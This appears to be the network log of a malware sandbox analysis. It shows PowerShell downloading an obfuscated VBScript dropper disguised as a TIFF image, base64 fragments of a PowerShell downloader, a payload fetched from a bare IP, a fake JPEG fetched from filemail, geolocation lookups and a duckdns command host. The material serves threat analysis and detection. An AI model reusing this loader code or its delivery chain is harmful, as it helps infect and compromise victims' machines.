Nov 18, 2024 16:53:19.290724039 CET | 1.1.1.1 | 192.168.2.8 | 0x6f7a | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:19.290738106 CET | 1.1.1.1 | 192.168.2.8 | 0x6f7a | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:19.294964075 CET | 1.1.1.1 | 192.168.2.8 | 0x6f7a | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:20.913058043 CET | 1.1.1.1 | 192.168.2.8 | 0x3204 | No error (0) | nextnewupdationsforu.duckdns.org | | 192.227.228.36 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:22.971534967 CET | 1.1.1.1 | 192.168.2.8 | 0xe12c | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:37.565247059 CET | 1.1.1.1 | 192.168.2.8 | 0x4803 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:37.748697996 CET | 1.1.1.1 | 192.168.2.8 | 0xbf45 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:37.748697996 CET | 1.1.1.1 | 192.168.2.8 | 0xbf45 | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:38.780034065 CET | 1.1.1.1 | 192.168.2.8 | 0xb2fc | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:41.538750887 CET | 1.1.1.1 | 192.168.2.8 | 0x5808 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:41.538750887 CET | 1.1.1.1 | 192.168.2.8 | 0x5808 | No error (0) | googlehosted.l.googleusercontent.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.050590038 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | scdn1f005.wpc.ad629.nucdn.net | sni1gl.wpc.nucdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:44.050590038 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | sni1gl.wpc.nucdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.748486996 CET | 1.1.1.1 | 192.168.2.8 | 0x67c2 | No error (0) | sb.scorecardresearch.com | | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.748486996 CET | 1.1.1.1 | 192.168.2.8 | 0x67c2 | No error (0) | sb.scorecardresearch.com | | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.748486996 CET | 1.1.1.1 | 192.168.2.8 | 0x67c2 | No error (0) | sb.scorecardresearch.com | | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.748486996 CET | 1.1.1.1 | 192.168.2.8 | 0x67c2 | No error (0) | sb.scorecardresearch.com | | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.755809069 CET | 1.1.1.1 | 192.168.2.8 | 0x45a0 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:44.759105921 CET | 1.1.1.1 | 192.168.2.8 | 0x5979 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:44.766096115 CET | 1.1.1.1 | 192.168.2.8 | 0x1b91 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:45.052838087 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | scdn1f005.wpc.ad629.nucdn.net | sni1gl.wpc.nucdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:45.052838087 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | sni1gl.wpc.nucdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:46.064677954 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | scdn1f005.wpc.ad629.nucdn.net | sni1gl.wpc.nucdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:46.064677954 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | sni1gl.wpc.nucdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:48.063422918 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | scdn1f005.wpc.ad629.nucdn.net | sni1gl.wpc.nucdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:48.063422918 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | sni1gl.wpc.nucdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:52.063488960 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | scdn1f005.wpc.ad629.nucdn.net | sni1gl.wpc.nucdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:53:52.063488960 CET | 1.1.1.1 | 192.168.2.8 | 0x2c58 | No error (0) | sni1gl.wpc.nucdn.net | | 152.199.21.175 | A (IP address) | IN (0x0001) | false
• 1017.filemail.com
• api.edgeoffer.microsoft.com
• clients2.googleusercontent.com
• 23.94.171.138
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 23.94.171.138 | 80 | 7628 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:52:22.917340040 CET | 345 | OUT | GET /329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 23.94.171.138
Connection: Keep-Alive
Nov 18, 2024 16:52:23.601640940 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 15:52:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Mon, 18 Nov 2024 06:00:22 GMT
ETag: "22650-62729a1d1dadd"
Accept-Ranges: bytes
Content-Length: 140880
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
Data Ascii:
Function atrocemente(ByVal alternipenne, ByVal emparedar, ByVal maiorino)
    Dim fuliginoso
    fuliginoso = InStr(alternipenne, emparedar)
    Do While fuliginoso > 0
        alternipenne = Left(alternipenne, fuliginoso - 1) & maiorino & Mid(alternipenne, fuliginoso + Len(emparedar))
        fuliginoso = InStr(fuliginoso + Len(maiorino), alternipenne, emparedar)
    Loop
    atrocemente = alternipenne
End Function
private fun
Nov 18, 2024 16:52:23.601675987 CET | 212 | IN | Data Ascii: ction ReadStdIn() while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll w
Nov 18, 2024 16:52:23.601691008 CET | 1236 | IN | Data Ascii: endend functionIf Not extenso() Then On Error Resume Next embasbacamento = "KPIVQSR
Nov 18, 2024 16:52:23.601784945 CET | 1236 | IN | Data Ascii: NITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGPIVQSRAZLDXBOTHV4dC5FbmNvZGluZ10n
Nov 18, 2024 16:52:23.601802111 CET | 1236 | IN | Data Ascii: gPIVQSRAZLDXBOTHMCAPIVQSRAZLDXBOTHtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydPIVQSRAZLDXBOTHCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXg
Nov 18, 2024 16:52:23.601819038 CET | 1236 | IN | Data Ascii: aCldO3NITmNvPIVQSRAZLDXBOTHbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJ" embasbacamento = embasbaca
Nov 18, 2024 16:52:23.601838112 CET | 884 | IN | Data Ascii: 0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFPIVQSRAZLDXBOTHkb
Nov 18, 2024 16:52:23.602257013 CET | 1236 | IN | Data Ascii: c1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzPIVQSRAZLDXBOTHSE4nLCckJykuUkVwbGFDZSgPIVQSRAZLDXBOTHnczdnJywnfCcpIHwmICggJFBzaG9tZVs
Nov 18, 2024 16:52:23.602279902 CET | 1236 | IN | Data Ascii: sieda = sieda & "WPIVQSRAZLDXBOTHj" sieda = sieda & "PIVQSRAZLDXBOTHuxPIVQSRAZLDXBOTHd " sieda =
Nov 18, 2024 16:52:23.602303028 CET | 1236 | IN | Data Ascii: LDXBOTH." sieda = sieda & "GePIVQSRAZLDXBOTHt" sieda = sieda & "StPIVQSRAZLDXBOTH" sieda = sie
Nov 18, 2024 16:52:23.606753111 CET | 1236 | IN | Data Ascii: VQSRAZLDXBOTHod" sieda = sieda & "igPIVQSRAZLDXBOTHo))PIVQSRAZLDXBOTH" sieda = sieda & ";poPIVQSRAZLDXB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 55648 | 23.94.171.138 | 80 | 752 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:52:55.833884954 CET | 77 | OUT | GET /329/FRSSDE.txt HTTP/1.1
Host: 23.94.171.138
Connection: Keep-Alive
Nov 18, 2024 16:52:56.510338068 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 15:52:56 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Mon, 18 Nov 2024 05:52:23 GMT
ETag: "a0800-62729854ef0be"
Accept-Ranges: bytes
Content-Length: 657408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 55651 | 178.237.33.50 | 80 | 3276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:53:22.981270075 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Nov 18, 2024 16:53:23.817079067 CET | 1164 | IN | HTTP/1.1 200 OK
date: Mon, 18 Nov 2024 15:53:23 GMT
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
Data Ascii: { "geoplugin_request":"155.94.241.187", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 142.215.209.78 | 443 | 752 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-18 15:52:33 UTC | 192 | OUT | GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
Host: 1017.filemail.com
Connection: Keep-Alive
2024-11-18 15:52:33 UTC | 324 | IN | HTTP/1.1 200 OK
Content-Length: 2230233
Content-Type: image/jpeg
Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
Accept-Ranges: bytes
ETag: 4bb5a8185f3b16880e3dcc573015c5d9
X-Transfer-ID: wxhdiueivoluihj
Content-Disposition: attachment; filename=new_imagem.jpg
Date: Mon, 18 Nov 2024 15:52:33 GMT
Connection: close
2024-11-18 15:52:33 UTC | 1979 | IN | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: b7 91 13 22 ad 06 54 03 6d fc 09 38 14 57 67 d4 4c ac a4 95 e4 10 eb 41 b6 9e d8 27 92 44 d2 46 c6 49 4d ba 83 4e 18 91 b4 d8 15 d3 00 1d a1 84 84 74 56 6e 4b 05 17 ce 19 e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5
Data Ascii: "Tm8WgLA'DFIMNtVnKHVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: a6 f7 55 0c 07 e2 f1 16 a5 b4 63 20 14 08 ef 82 7d 71 2e 58 07 04 f5 17 8a 82 41 04 1a 3d 88 ca 90 4d 93 77 de f0 35 13 c5 c2 ae d6 8d 89 ff 00 15 f2 30 b1 78 8a bb 02 49 1f 4c c5 cd 0f 0e 89 24 49 77 38 56 e0 2d 8b c0 d6 66 56 60 f2 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d
Data Ascii: Uc }q.XA=Mw50xIL$Iw8V-fV`lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: 12 e8 d7 cb 1c 8f ca 82 16 42 02 28 35 f3 e0 73 8a b4 da 7d 2e e2 ce a4 3f 6a bf d3 03 3d d4 49 37 3d 46 3e 0a 6a 75 29 a7 99 76 ee 5f e1 7a 1e c2 c6 5d 20 d3 b1 33 29 06 36 16 bf c3 8a 68 a1 77 d4 c9 32 80 4a de d0 df df 00 7a b9 65 86 63 a7 40 49 1c 70 01 fe 99 55 81 fc 90 ce 08 37 76 57 fe 99 a3 0e 8a 45 69 24 99 48 95 bd 41 98 70 7e bd 3f 3c 5a 55 74 b4 92 d0 af 63 5d fd b9 c0 ab 7a 94 6d f4 8f e7 94 69 b6 45 d2 c9 f8 03 fc f2 63 06 30 54 8f 97 c7 f5 c9 78 dd 88 52 85 87 c3 01 33 a8 90 ca 3d 2b e9 3d 02 8f ed 9a c2 38 a7 41 b1 00 b1 dd 47 fe 9c 54 69 ae 45 42 a1 79 ef 8f b4 1b 2b cb 46 05 79 e0 5d e0 05 3c 2d e0 f5 6f 56 5e eb 5e f9 44 92 1d 1f 88 6e 2a 0c 6f 6a 6b f8 79 18 e3 6a 1d d7 60 85 81 61 c9 b0 3f 4b cc 49 6d 65 65 2a cc 70 3d 40 93 4e d1 5a
Data Ascii: B(5s}.?j=I7=F>ju)v_z] 3)6hw2Jzec@IpU7vWEi$HAp~?<ZUtc]zmiEc0TxR3=+=8AGTiEBy+Fy]<-oV^^Dn*ojkyj`a?KImee*p=@NZ
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: 70 28 8b b8 f3 9c c6 b8 1c 0c e4 e3 25 54 1b 24 8f 95 e0 50 02 78 19 20 31 34 3f 2c 66 0d 23 ea 25 11 c6 54 1a 24 96 3e 95 1e e4 f6 c7 64 d4 47 a3 88 e9 f4 84 33 91 52 4f b4 1b f8 2d f6 fd 70 33 e3 9d f4 cc 4c 64 ac 9d 37 0e df 2c a8 90 d1 b2 77 75 bc e0 42 df e1 3d fe 39 24 06 6f 4f 02 ba 7b de 05 d2 66 0c 0b 72 01 04 8b ea 31 90 11 c4 40 33 8d f0 bc 8d 66 fd 40 b5 7f 21 95 83 4b bb 4c fa 89 5b 64 6a a4 21 3c 6f 6a e0 0f ae 0c 6b 26 0a 10 37 a4 73 44 03 c7 26 be 5c e0 4c 88 86 05 7b 70 de 4e ee 7b 9d e5 7f 2a ca 4b 02 a9 d4 15 26 92 60 8a 7d c1 dd fd 86 73 6a 5d ac c8 c4 92 81 45 00 28 58 35 f2 ce 33 bb c6 c8 cd 60 90 c7 8a e8 0f eb ce 03 30 e9 f4 ec f1 19 09 a6 8f 70 4d c1 6d b7 6d ad c4 50 14 09 e7 da b2 f2 69 13 48 1a 60 86 cb 28 8c 12 29 6c 37 27 a8
Data Ascii: p(%T$Px 14?,f#%T$>dG3RO-p3Ld7,wuB=9$oO{fr1@3f@!KL[dj!<ojk&7sD&\L{pN{*K&`}sj]E(X53`0pMmmPiH`()l7'
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: 5e 49 c3 ea 41 58 74 97 ff 00 d0 9f ff 00 a8 d8 04 7f b4 1a b8 c0 8d 12 2b 55 da 18 c6 77 30 ae 97 78 44 fb 4f ae 66 04 e9 b4 b6 a0 05 a4 6e 78 ff 00 7b 33 5d 01 27 8b f8 60 89 e6 80 aa c0 d7 7f b5 3e 22 b6 04 1a 6e 47 45 56 af af ab 00 ff 00 69 f5 93 28 47 48 a2 62 d6 cf 1a b0 35 55 c8 bc cd 2d bb e7 95 91 55 85 1e 78 c0 f5 d3 fd a1 9e 2f 09 d0 ea 91 20 dd 36 ff 00 c4 ad 56 ad 42 bf ae 55 fc 7b 52 9e 11 1e a1 a3 88 4b 34 84 27 a1 a9 90 75 6e bf e2 a1 99 1a d0 17 ec ff 00 83 82 c2 ee 6b 27 a0 1b 86 35 ac d3 b2 f8 57 86 47 33 a4 41 23 69 4c 8e de 90 18 d8 0a 07 24 8e f4 3f 2e b8 14 1f 69 b5 2a 4b 14 89 98 73 65 0f 1f 2e 71 7d 52 cf 28 1a 99 22 8e 1d c4 33 0b 55 66 b3 d4 29 36 7e 63 06 75 29 13 83 a6 89 55 bf fa 67 f5 35 fc 07 45 f7 f7 f8 e0 1c b3 ee 66 25
Data Ascii: ^IAXt+Uw0xDOfnx{3]'`>"nGEVi(GHb5U-Ux/ 6VBU{RK4'unk'5WG3A#iL$?.i*Kse.q}R("3Uf)6~cu)Ug5Ef%
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: db 34 65 d2 6b a2 62 c9 6a 92 31 62 41 a2 7d f1 34 d1 4f 2f 0a 37 35 90 40 36 70 07 a7 85 a6 b5 46 21 af a6 6b 42 ba 65 85 43 c2 1d c1 a2 4f 1c f4 cc b8 24 97 47 a9 2a 16 9b f0 90 73 41 a1 4d 52 19 12 32 19 40 f5 06 22 fe 38 17 97 4b a6 d3 96 04 1d d3 50 5f 65 be 99 6d 24 5a 75 8a 30 da 8d cc c6 82 a7 a8 86 3f db 02 9a 39 93 55 a7 25 cc a8 db 5a 99 8d 81 79 ab ca 4f 2e 98 20 da 57 f0 81 c7 42 70 19 8b 44 a9 09 42 4b 7a a8 b1 5a fe 98 be bb 4b 09 85 52 b6 d5 9b f7 ae 72 ba 1d 63 b4 2d 6a 09 dd 42 87 60 2b 1c 31 79 f1 94 90 58 65 a2 0d f7 f9 60 61 47 04 72 c3 71 51 07 bf be 2a fa 6f de 6d 66 ba e7 e5 9a 6f a3 5d 04 33 49 bf 6c 65 c2 aa a1 3c 0e 96 6f 9e b8 03 6d 27 21 41 a0 18 e0 27 e4 08 98 79 6d 64 8b bf 6c 73 4a 5d 9d 90 ab 5a 8f c5 5c 13 93 2a 6d 03 6a
Data Ascii: 4ekbj1bA}4O/75@6pF!kBeCO$G*sAMR2@"8KP_em$Zu0?9U%ZyO. WBpDBKzZKRrc-jB`+1yXe`aGrqQ*omfo]3Ile<om'!A'ymdlsJ]Z\*mj
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: db bb 8e dd d4 e2 0a 6a d4 8b bc 66 69 a6 31 f9 66 47 31 74 db b8 d7 5b e9 75 d4 e0 51 d1 92 d9 07 a0 22 b3 73 ee 07 f5 cb e8 d1 8e b6 20 f1 96 56 60 ac b5 da c5 e2 e1 de b6 ee 6a ae 97 db 08 24 71 65 18 a8 fc 44 29 3e fd 7a fc b0 1a 85 11 9e 26 64 2c 0c 2e cc 2c 8f 50 dd 5f c9 70 4f 0a 84 8f d4 15 8c 7b d9 98 1e 4e e2 3f 95 62 fb dd 54 00 ed ef 57 fd 32 a5 d8 9d c4 92 6a b9 c0 3e d4 68 a4 d8 37 10 ca 03 73 c0 a3 78 19 94 2c d2 28 e5 43 1a 3f 0b cb 2c 8c 80 84 6a b3 76 0d 7b e0 89 b0 6f de ef 02 01 a6 07 3d 1f d9 f9 f5 12 b4 e0 ca ec aa 14 00 cc 49 17 7d 39 f8 67 9d 03 9e 97 f0 cd bf b3 c5 c0 d4 ec 04 9f 49 e3 b7 e2 c0 d0 1a 86 8f c4 84 6d 24 a1 89 e0 5f 6c 67 52 ee cc 88 19 88 0e 7f 17 cb 38 bc 51 cc 1e 50 04 8f c5 d5 9a cb 6b 59 96 25 71 1b 1f 50 51 4b
Data Ascii: jfi1fG1t[uQ"s V`j$qeD)>z&d,.,P_pO{N?bTW2j>h7sx,(C?,jv{o=I}9gIm$_lgR8QPkY%qPQK
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: 39 c0 72 2d 5c 51 f9 5a 63 1a 14 28 43 c8 43 75 6e 49 ab a3 b4 91 db f8 72 8f ab 49 0c ca 5c 95 3a 68 a3 4b 06 89 1b 09 1f a3 1c 4a 45 65 0a 59 40 2c 2e 83 0f ef 95 da ce aa e1 45 92 c3 93 ec 01 fe b8 1b 53 4a 34 c4 cb 21 95 43 6b 16 60 8c a5 6b f1 13 c3 75 3c 8b af 71 80 3a 88 d3 6a 46 f0 84 09 33 7e ed 5a ad 93 68 bd dc dd 8c cc 58 26 76 0c b1 d8 65 df f8 b8 db 7b 6c fc 2f 2e 51 c2 3d 83 e6 29 55 db 57 60 82 41 bc 0d 09 f5 50 9d 2b 84 31 ab 34 4b 1b d2 b1 63 b4 2d ee 37 b6 bd 3d 86 24 4a ac 6e a1 9c 7a 95 94 37 42 00 23 91 ef ce 2e 1e ec d0 15 c1 f9 e4 02 d3 38 45 04 b3 10 05 7b e0 3c 5a 09 b4 fa 7d fa 88 d0 c5 19 57 42 ad b8 9d cc dc 50 ae fe f8 64 f1 08 9b 54 da 96 11 6e 5d 43 4c 37 86 be 4a 90 06 d2 01 3e 9e e4 66 72 c1 3b 48 a8 a0 33 35 d2 86 06 c8
Data Ascii: 9r-\QZc(CCunIrI\:hKJEeY@,.ESJ4!Ck`ku<q:jF3~ZhX&ve{l/.Q=)UW`AP+14Kc-7=$Jnz7B#.8E{<Z}WBPdTn]CL7J>fr;H35
2024-11-18 15:52:33 UTC | 8192 | IN | Data Raw: 02 29 e7 ae 00 34 31 79 72 e9 40 e8 4b 93 ff 00 28 cd 82 ab b3 91 ea f7 c4 63 8d 91 61 90 0b 3b d8 57 fc 2b 8c ce f2 30 0b 1f 04 8c 0a 13 64 ee 16 33 8c 4a ca 59 78 38 36 49 43 80 09 62 47 35 8e 40 ac ab 4d 5f 1c 0f 3d a8 8e fc 63 a5 f0 b6 7d ba 62 fe 20 a5 dd 12 c3 05 04 0a f6 e3 34 75 30 b0 f1 26 65 23 d5 b7 9b ed 43 03 3e 9c a0 42 54 7a 83 72 3b d8 c0 5a 5d 38 ff 00 66 c6 6c 9a a0 c0 0e 3a 8c 5f 4b a3 47 9a 47 dc 54 46 6d 68 f2 73 4a 99 74 2d 43 b0 02 c7 eb 89 2c 54 49 22 fe 5c 60 2d ae 8d 5a 65 20 35 6d aa 3d 7a 9c d2 96 05 9a 17 55 6d c4 02 68 8b e7 da b1 59 93 7b 86 f5 6d ac 70 90 15 c8 52 24 22 94 a9 ed 56 3f 5c 0c 79 50 6e 05 15 59 56 b9 0b 42 f9 24 65 5c b1 66 05 55 43 30 6b 0a 0e 3a f1 5b 72 85 58 fe 2a e8 70 26 23 7e f8 01 48 12 52 06 fd ac cd
